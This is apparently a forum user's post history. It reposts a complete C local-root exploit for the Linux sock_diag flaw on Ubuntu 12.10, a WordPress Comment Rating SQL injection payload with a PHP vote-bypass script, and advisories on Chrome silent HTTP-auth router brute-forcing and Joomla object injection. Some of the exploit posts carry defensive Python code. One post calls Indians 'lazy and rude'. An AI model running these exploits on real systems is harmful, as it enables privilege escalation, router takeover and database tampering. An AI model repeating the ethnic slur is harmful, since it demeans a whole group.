Gonzalez

Posts posted by Gonzalez

  1. Local root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[] vulnerability in Linux kernels before 3.7.10.


    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <sys/mman.h>

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlers, nl_table;

    int __attribute__((regparm(3)))
    x()
    {
        commit_creds(prepare_kernel_cred(0));
        return -1;
    }

    char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    int main() {
        int fd;
        unsigned long mmap_start, mmap_size = 0x10000;
        unsigned family;
        struct {
            struct nlmsghdr nlh;
            struct unix_diag_req r;
        } req;
        char buf[8192];

        if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0) {
            printf("Can't create sock diag socket\n");
            return -1;
        }

        memset(&req, 0, sizeof(req));
        req.nlh.nlmsg_len = sizeof(req);
        req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
        req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        req.nlh.nlmsg_seq = 123456;

        req.r.udiag_states = -1;
        req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

        /* Ubuntu 12.10 x86_64 */
        req.r.sdiag_family = 0x37;
        commit_creds = (_commit_creds) 0xffffffff8107d180;
        prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
        mmap_start = 0x1a000;

        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
                 MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
            printf("mmap fault\n");
            exit(1);
        }

        *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
        memset((void *)mmap_start, 0x90, mmap_size);
        memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

        send(fd, &req, sizeof(req), 0);
        if(!getuid())
            system("/bin/sh");
        return 0;
    }

  2. First of all, do what you enjoy; don't learn programming just because it's better paid than x. Be a freelancer with your talent. Programming is rather hard at the beginning, but it's worth knowing; you never know what opportunity will come your way. I have many programmer friends who now live in America. They got there with the help of the company they worked for.

    If you don't know how to do anything, start from zero, read tutorials and so on until you learn one thing, and then perfect it. When it comes to clients, be confident and deliver the project 100%.

    Don't forget: do what you enjoy.

    -Gonzalez

  3. 1. Code/Racer

    Made by the team at Treehouse, Code/Racer is an online racing game that forces you to learn to code quickly to get ahead on the race track. Beyond this racing game, Treehouse boasts more than 650 instructional videos; as you complete courses, earn badges for your accomplishments.

    2. MIT OpenCourseWare

    MIT has opened all of its course content to web audiences, so anyone, anywhere can learn from one of the top American research institutions. Think about it: An MIT education without the student loans or cut-throat application? Not too shabby.

    3. Udacity

    Udacity believes today's higher education system is broken. Education is no longer something that happens once in a lifetime, but rather is a lifelong experience. That's why it has ported loads of computer science, math and physics courses online.

    4. Mozilla Developer Network

    The Mozilla Developer Network is a resource-rich collection of documents about web development, made for anyone, from expert programmers to students just starting out. MDN is a wiki, meaning anyone can edit its pages with corrections and updates.

    5. The CodePlayer

    On The CodePlayer, watch interactive presentations that explain how people built things from scratch. Once you become a coding pro, you can add your own presentations to teach others what you know.

    6. Coursera

    Online education giant Coursera brings courses from dozens of top universities online, and lets anyone take them for free. Coursera classes are now available in five languages, English, Spanish, French, Italian and Chinese, and are taught by professors from 62 universities.

    7. Codeacademy

    Unlike some of these other online education platforms, Codeacademy focuses solely on teaching coding. You can choose from courses grouped into eight tracks: APIs, Ruby, Python, JavaScript, jQuery, PHP, web fundamentals, or combine languages into projects.

    8. Khan Academy

    Khan Academy brings millions of students from around the world together to learn all sorts of digital skills, from coding to calculus to computer science theory. This means you can become an expert coder and an expert mathematician in the same place.

    9. Learn Python the Hard Way

    Learn Python the Hard Way offers free PDFs, though, if you want to take the video version of the course, you'll need to fork up $29. What does learning the "Hard Way" mean? The number-one rule is that you can't copy-paste; you must type out each of the lessons in order to teach your hands the language.

    10. HTML5 Rocks

    HTML5 Rocks is a one-stop guide to learning HTML5, written by tons of contributors who work for Google, Adobe and a bunch of other places. As an HTML5 Rocks student, you'll learn from slides, presentations and videos.

  4. That I don't know; it wouldn't be normal to get away with such a sum, for example $200-300, it wouldn't be fair, at least in my opinion. I think PayPal will contact you to pay that amount. It's best never to be in the negative. I told you: if you're in the negative when you receive money in the account, that money will cover the negative amount. My advice is never to have a negative balance in the account.

    -Gonzalez

  5. If you plan to use the account, then when you receive money on it, -$30 will disappear from the money you received; unfortunately, I've been in your situation before, and it totally sucks. I learned my lesson that Indians aren't allowed on PayPal, they don't have access; and I no longer do business with them + they're lazy and rude people.

    -Gonzalez

  6. # Exploit Title: [Google Chrome Silent HTTP Authentication]
    # Date: [2-5-2013]
    # Exploit Author: [T355]
    # Vendor Homepage: [http://www.google.com/chrome]
    # Version: [24.0.1312.57]
    # Tested on: [Tested on: Windows 7 & Mac OSX Mountain Lion]
    # CVE : [n/a]

    VULNERABILITY DETAILS
    The latest version of Google Chrome (Tested on Version 24.0.1312.57)
    fails to properly recognize HTTP Basic Authentication when injected in
    various HTML tags. As a result of this behavior Chrome will not alert
    the user when HTTP Basic Authentication is taking place or when
    credentials are rejected. This behavior is particularly concerning
    with respect to small office and home routers. Such devices are easily
    brute forced using this method. Many of these devices have the default
    password enabled which brings me to part II of this bug. Silent HTTP
    Authentication allows the attacker to log into the router and change
    settings with no alerts and or warnings issued by Chrome. The end
    result allows an attacker to brute force the router login, connect to
    the router, enable remote administration and of course control all
    information on the entire network via DNS attacks etc.
    REPRODUCTION CASE
    I have attached the following files:

    sploit.txt - Indicates the buggy code.
    jquery.js - Used for real world scenario but not needed for bug.
    brute.js - Real world attack scenario for this bug.
    index.html - HTML Attack Page
    attack.php - Payload file for Linksys Routers.

    VERSION
    Chrome Version: [24.0.1312.57]
    Operating System: [Tested on: Windows 7 & Mac OSX Mountain Lion]

    CREDIT
    T355

    IMPACT
    The impact for this bug is enormous. Tens of millions of home routers
    can easily be completely compromised. Distributed brute force attacks
    can be performed on any HTTP Authentication portal.

    RECOMMENDATIONS
    Reference how Firefox and Safari handle the attached code.

    PoC: http://www.exploit-db.com/sploits/24486.tar.gz
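Because the browser behaviour described above gives the user no prompt when credentials are rejected, the only trace of such a brute-force run is on the target's side. The following is an added example, not part of the advisory: a detector that parses constructed Common Log Format lines and flags clients with a burst of 401 responses (the window and threshold are assumptions).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format; the 401 status is the only trace a silent failed attempt leaves.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, status) for a CLF line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), int(m["status"])

def auth_bruteforce_sources(lines, window=timedelta(seconds=60), threshold=5):
    """Map client IP -> total 401s, for clients with >= threshold 401s inside one window."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == 401:
            failures[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in failures.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):           # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged

# Constructed sample: five silent failures from one client in four seconds, then a success.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Feb/2013:10:00:00 +0000] "GET /login.cgi HTTP/1.1" 401 -
192.0.2.10 - admin [05/Feb/2013:10:00:01 +0000] "GET /login.cgi HTTP/1.1" 401 -
192.0.2.10 - admin [05/Feb/2013:10:00:02 +0000] "GET /login.cgi HTTP/1.1" 401 -
192.0.2.10 - admin [05/Feb/2013:10:00:03 +0000] "GET /login.cgi HTTP/1.1" 401 -
192.0.2.10 - admin [05/Feb/2013:10:00:04 +0000] "GET /login.cgi HTTP/1.1" 401 -
198.51.100.7 - - [05/Feb/2013:10:00:04 +0000] "GET /login.cgi HTTP/1.1" 401 -
192.0.2.10 - admin [05/Feb/2013:10:00:06 +0000] "GET /login.cgi HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    print(auth_bruteforce_sources(SAMPLE_LOG.splitlines()))
```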

  7. # Exploit Title: Wordpress plugin: Comment Rating SQL injection
    # Google Dork:
    # Date: 21/02/2013
    # Exploit Author: ebanyu
    # Url Author: www.ebanyu.com.ar
    # Vendor Homepage: wealthynetizen.com
    # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
    # Version: 2.9.32
    # Tested on: Fedora 18 + mysql 5.5 + php 5.4



    Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

    First, it takes the IP from the HTTP_X_FORWARDED_FOR header.
    -----------------------------------------------------------------------
    48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
    49 if(strstr($row['ck_ips'], $ip)) {
    50 // die('error|You have already voted on this item!');
    51 // Just don't count duplicated votes
    52 $duplicated = 1;
    53 $ck_ips = $row['ck_ips'];
    54 }

    Later, it makes an UPDATE without filtering the input.
    ------------------------------------------------------------------------
    77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";


    So let's take a look at the DB:

    mysql> select * from wp_comment_rating;
    +---------------+----------------+--------------+----------------+
    | ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
    +---------------+----------------+--------------+----------------+
    |             2 | ,20.209.10.130 |            1 |              0 |
    |             3 |                |            0 |              0 |
    +---------------+----------------+--------------+----------------+
    2 rows in set (0.00 sec)


    Now make an HTTP request with an injection in the HTTP_X_FORWARDED_FOR header:

    GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
    Host: 192.168.1.10
    Accept-Encoding: gzip, deflate
    X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
    Connection: keep-alive


    And the result is:

    mysql> select * from wp_comment_rating;
    +---------------+---------------------+--------------+----------------+
    | ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
    +---------------+---------------------+--------------+----------------+
    |             2 | wordpress@localhost |            2 |              0 |
    |             3 |                     |            0 |              0 |
    +---------------+---------------------+--------------+----------------+
    2 rows in set (0.00 sec)

    Cheers

    =======================================================================================


    # Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
    # Date: 21/02/2013
    # Exploit Author: ebanyu
    # Url Author: www.ebanyu.com.ar
    # Vendor Homepage: wealthynetizen.com
    # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
    # Version: 2.9.32
    # Tested on: Fedora 18 + mysql 5.5 + php 5.4


    Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

    First, it takes the IP from the HTTP_X_FORWARDED_FOR header.
    -----------------------------------------------------------------------
    48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
    49 if(strstr($row['ck_ips'], $ip)) {
    50 // die('error|You have already voted on this item!');
    51 // Just don't count duplicated votes
    52 $duplicated = 1;
    53 $ck_ips = $row['ck_ips'];
    54 }

    Later, it makes an UPDATE without filtering the input.
    ------------------------------------------------------------------------
    77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";


    Now, to bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it on each request.

    A simple PoC is written in PHP.

    <?PHP

    define('HOST','http://localhost/wordpress/');
    define('IDCOMMENT',2);
    $url=parse_url(HOST);
    define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_');
    for($i=0;$i<1;$i++) lvlup();

    function lvlup(){
        global $url;
        $header = "GET ".URL." HTTP/1.1 \r\n";
        $header.= "Host: ".$url['host']."\r\n";
        $header.= "Accept-Encoding: gzip, deflate \r\n";
        $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n";
        $header.= "Connection: close \r\n\r\n";
        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        socket_connect($socket,$url['host'], 80);
        socket_write($socket, $header);
        socket_close($socket);
    }

    ?>
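Both advisories above come down to the same two defects in ck-processkarma.php: the voter's identity is taken from a header any client can set, and that value is concatenated into the UPDATE. The following is an added example, not the plugin's code, of the hardened handling: X-Forwarded-For is honoured only when the request came from a trusted proxy, every hop must parse as an IP address, the rating column is whitelisted rather than built from input, and the query is parameterized. sqlite3 stands in for MySQL and the proxy address is an assumption.

```python
import ipaddress
import sqlite3

TRUSTED_PROXIES = {"10.0.0.5"}   # assumption: the site's own reverse proxy

def client_ip(remote_addr, xff=None):
    """Voter's IP: X-Forwarded-For counts only when a trusted proxy sent it."""
    if remote_addr not in TRUSTED_PROXIES or not xff:
        return remote_addr
    last_hop = xff.split(",")[-1].strip()     # the entry the proxy itself appended
    try:
        return str(ipaddress.ip_address(last_hop))
    except ValueError:                        # e.g. the advisory's "', ck_ips=(select user()) ..."
        return None

def setup_db():
    """Constructed stand-in for wp_comment_rating (sqlite instead of MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_comment_rating (ck_comment_id INTEGER PRIMARY KEY,"
                 " ck_ips TEXT NOT NULL DEFAULT '', ck_rating_up INTEGER DEFAULT 0,"
                 " ck_rating_down INTEGER DEFAULT 0)")
    conn.execute("INSERT INTO wp_comment_rating VALUES (2, '', 0, 0)")
    return conn

def vote(conn, comment_id, direction, remote_addr, xff=None):
    """Count one vote per IP; True if counted, False if refused or duplicate."""
    if direction not in ("up", "down"):       # column chosen from a whitelist, never from input
        return False
    ip = client_ip(remote_addr, xff)
    if ip is None:
        return False
    row = conn.execute("SELECT ck_ips FROM wp_comment_rating WHERE ck_comment_id = ?",
                       (comment_id,)).fetchone()
    if row is None:
        return False
    seen = [s for s in row[0].split(",") if s]
    if ip in seen:                            # exact match; strstr() also matched substrings
        return False
    seen.append(ip)
    col = "ck_rating_" + direction
    # Values travel as bind parameters, so a quote in ck_ips can never close the literal.
    conn.execute("UPDATE wp_comment_rating SET %s = %s + 1, ck_ips = ? WHERE ck_comment_id = ?"
                 % (col, col), (",".join(seen), comment_id))
    return True
```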

  8. -------------------------------------------------------------------
    Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
    -------------------------------------------------------------------


    [-] Software Link:

    http://www.joomla.org/


    [-] Affected Versions:

    Version 3.0.2 and earlier 3.0.x versions.
    Version 2.5.8 and earlier 2.5.x versions.


    [-] Vulnerability Description:

    The vulnerable code is located in /plugins/system/highlight/highlight.php:

    56. // Get the terms to highlight from the request.
    57. $terms = $input->request->get('highlight', null, 'base64');
    58. $terms = $terms ? unserialize(base64_decode($terms)) : null;

    User input passed through the "highlight" parameter is not properly sanitized before being used in
    an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the
    application scope. Successful exploitation of this vulnerability doesn't require authentication,
    but requires the "System Highlight" plugin to be enabled (such as by default configuration).


    [-] Solution:

    Upgrade to version 3.0.3 or 2.5.9.


    [-] Disclosure Timeline:

    [31/10/2012] - Vendor notified
    [08/11/2012] - Vendor asked for a proof of concept
    [08/11/2012] - Proof of concept provided to the vendor
    [04/02/2013] - Vendor update released
    [27/02/2013] - Public disclosure


    [-] CVE Reference:

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2013-1453 to this vulnerability.


    [-] Credits:

    Vulnerability discovered by Egidio Romano.


    [-] Original Advisory:

    http://karmainsecurity.com/KIS-2013-03
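The plugin only ever needs an array of search-term strings from the "highlight" parameter, so a request-layer check can parse the PHP serialization format itself and refuse anything else before unserialize() sees it, in particular the O:<len>:"Class":... records that object injection relies on. Added example, not Joomla's code; the max_terms limit is an assumption.

```python
import base64

class Rejected(ValueError):
    """The parameter is not a flat PHP array of strings."""

def _parse(data, pos):
    """Parse one PHP-serialized value at pos; return (value, new_pos)."""
    tag = data[pos:pos + 1]
    if tag == b"s":                                  # s:<len>:"<bytes>";
        colon = data.index(b":", pos + 2)
        start = colon + 2
        end = start + int(data[pos + 2:colon])
        if data[end:end + 2] != b'";':
            raise Rejected("malformed string")
        return data[start:end].decode("utf-8"), end + 2
    if tag == b"i":                                  # i:<int>;
        semi = data.index(b";", pos)
        return int(data[pos + 2:semi]), semi + 1
    if tag == b"a":                                  # a:<n>:{<key><value>...}
        colon = data.index(b":", pos + 2)
        count, pos, items = int(data[pos + 2:colon]), colon + 2, []
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            if not isinstance(key, int) or not isinstance(val, str):
                raise Rejected("only integer => string entries are allowed")
            items.append(val)
        if data[pos:pos + 1] != b"}":
            raise Rejected("malformed array")
        return items, pos + 1
    # O: (objects), C:, r:/R: (references), d:, b:, N: are all refused.
    raise Rejected("refused type %r" % tag)

def highlight_terms(param, max_terms=20):
    """Decode ?highlight=<base64> into a list of terms, or None if refused."""
    try:
        raw = base64.b64decode(param, validate=True)
        value, end = _parse(raw, 0)
    except (ValueError, RecursionError):   # bad base64, bad digits, deep nesting, Rejected
        return None
    if end != len(raw) or not isinstance(value, list) or len(value) > max_terms:
        return None
    return value

def encode_terms(terms):
    """Build the legitimate form of the parameter: a:<n>:{i:0;s:<len>:"term";...}."""
    body = b"".join(b'i:%d;s:%d:"%s";' % (i, len(t.encode()), t.encode())
                    for i, t in enumerate(terms))
    return base64.b64encode(b"a:%d:{%s}" % (len(terms), body)).decode()
```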
